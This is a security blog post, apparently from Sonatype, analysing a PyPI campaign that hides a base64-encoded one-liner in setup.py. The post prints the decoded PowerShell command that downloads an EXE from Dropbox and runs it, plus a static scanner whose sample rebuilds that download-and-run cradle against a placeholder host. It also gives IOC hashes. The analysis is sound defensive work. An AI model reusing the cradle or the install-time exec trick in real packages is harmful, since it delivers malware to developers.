Attacker Floods PyPI With 1000s of Malicious Packages That Drop Windows Trojan Via Dropbox

Sonatype has been tracking an open source malware campaign that developed over the weekend, in which a threat actor is flooding the PyPI software registry with thousands of malicious packages. PyPI administrators are rapidly removing them, but the uploads have continued well into today.

Security researcher Félix Aimé first brought the reports of this activity to our notice.

Downloads Windows Trojan From Dropbox

We observed hundreds of packages being published and removed in batches on the PyPI registry. Their names are arbitrary, even though some contain contextual-looking terms such as "libs" and "nvidiapaypalsuper." All share the same description, "A library for creating a terminal user interface."

Screenshot of the download interface showing six different packages with the description "A library for creating a terminal user interface."

Although these packages are rapidly being purged as they appear on PyPI, Sonatype's malware archives continue to retain copies of these malicious artifacts.

Based on our analysis, these packages contain an identical payload targeting Windows users, as shown below.

The 'setup.py' within these packages is the package's installation script, which setuptools executes when pip builds and installs a source distribution; code placed there runs on the victim's machine without the package ever being imported. Here it contains a one-liner payload that is base64-encoded, so a plain search of the source for "powershell" or "dropbox" turns up nothing until the string is decoded:
Screenshot of the 'setup.py' within the packages that contains the one-liner payload.
The malicious code (line 9 in the screenshot) decodes and runs a PowerShell command on the infected Windows machine to download a second-stage payload from a Dropbox URL:

powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" -OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"
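
Because the payload only becomes visible after decoding, triage of a suspect package is best done by parsing setup.py without executing it. The scanner below is an example added here; it is not Sonatype's tooling and not code from the packages. It walks the setup.py syntax tree, flags exec()/eval() calls that would run code at install time, decodes any long base64 string literal, and matches the decoded text against indicators drawn from this campaign (PowerShell download cradle, .exe, Dropbox) plus the shared package description. The sample setup.py it runs on is constructed for the example: the host example.invalid is a placeholder, while the package name and description mirror the ones reported above.

```python
import ast
import base64
import binascii
import re

# Strings an analyst would expect in the decoded one-liner of this campaign:
# a PowerShell download cradle that fetches and launches a second-stage EXE.
DECODED_INDICATORS = (
    "powershell",
    "invoke-webrequest",
    "invoke-expression",
    "downloadstring",
    "dropbox.com",
    ".exe",
)
# Metadata shared by every package in the campaign, as reported above.
CAMPAIGN_DESCRIPTION = "A library for creating a terminal user interface"

# Constructed plaintext for the sample below: same shape as the campaign's one-liner,
# but pointing at a placeholder host (example.invalid), not the real Dropbox URL.
SAMPLE_PLAINTEXT = (
    "import os; os.system('powershell Invoke-WebRequest "
    '-Uri "https://example.invalid/payload.exe" '
    '-OutFile "~/WindowsCache.exe"; '
    'Invoke-Expression "~/WindowsCache.exe"\')'
)
# Constructed sample setup.py (not an artifact recovered from PyPI). The payload is
# encoded here at runtime so the reader can see exactly what the blob decodes to.
SAMPLE_SETUP_PY = f'''
from setuptools import setup
import base64
exec(base64.b64decode("{base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode()}"))
setup(
    name="nvidiapaypalsuper",
    version="0.0.1",
    description="{CAMPAIGN_DESCRIPTION}",
)
'''


def try_base64(text):
    """Decode `text` if it is a plausible base64 blob of readable text, else return None."""
    if len(text) < 24 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", text):
        return None
    try:
        raw = base64.b64decode(text, validate=True)  # reject stray characters
        decoded = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
        return decoded
    return None


def decoded_payloads(source):
    """Return every string literal in `source` that decodes from base64 to readable text."""
    payloads = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = try_base64(node.value)
            if decoded is not None:
                payloads.append(decoded)
    return payloads


def scan_setup_py(source):
    """Return human-readable findings for one setup.py; an empty list means nothing flagged."""
    try:
        tree = ast.parse(source)  # static parse only: the script is never executed
    except SyntaxError as exc:
        return [f"setup.py does not parse ({exc.msg}); inspect manually"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", None)
            if name in ("exec", "eval") and node.args:
                findings.append(f"line {node.lineno}: {name}() runs code at install time")
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = try_base64(node.value)
            if decoded is not None:
                hits = [i for i in DECODED_INDICATORS if i in decoded.lower()]
                if hits:
                    findings.append(
                        f"line {node.lineno}: base64 literal decodes to text containing "
                        + ", ".join(hits)
                    )
            if node.value.strip() == CAMPAIGN_DESCRIPTION:
                findings.append(
                    f"line {node.lineno}: description matches the campaign's shared metadata"
                )
    return findings


if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

Run it against the extracted sdist of a suspect package, never against an installed one: pip would execute setup.py before the scan ran. The literal-based check is a triage aid, not a verdict; a payload assembled from concatenated fragments, hex, or a string fetched at install time is not decoded here, which is why the exec()/eval() finding is reported on its own.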

Thankfully, by the time of our analysis Dropbox had already suspended the offending URL, although we were still able to obtain copies of the malicious executable from another source:
Screen shot of what the malware looks like when executed.

The malicious EXEs (IOCs below) downloaded by the illicit packages are Windows Trojans with potential spyware and info-stealing capabilities:

  • WindowsCache.exe:
    8ab8ddfa3f61334cf9386b62aea3a761852b3d785d9f21b8a638cc42b0af7afd [VirusTotal]
  • update.exe:
    51162376051669cbf4d2b11b1300ba7be6758ca0ca1979ce736fe70ae7289bc2 [VirusTotal]

The threat actor publishing these packages calls themselves 'EsqueleSquad' and, interestingly, has included their email address and website, "www.esquelesquad[.]rip", within these packages:

A screenshot of the message that 'EsqueleSquad' uses to direct people to their email address and website. A black background with red font that reads "EsqueleSquad Doxes Tools Help".

It is still unclear what purpose the threat actor is trying to achieve, mainly because, despite containing a working malicious payload, the packages are named confusingly with no obvious targets. The malicious influx of packages in batches continues at the time of writing, and our researchers continue to monitor the situation.

In late 2022, threat actors flooded the PyPI and npm registries with over 200 cryptominers. In early 2021, we saw more than 5,000 dependency confusion packages infiltrating both open source registries.

Users of Sonatype Repository Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.

Written by Ax Sharma

Ax is a security researcher, malware analyst and journalist with a penchant for open source software. His works and expert analyses have frequently been featured by leading media outlets including the BBC. Ax's expertise lies in security vulnerability research, reverse engineering, and cybercrime ...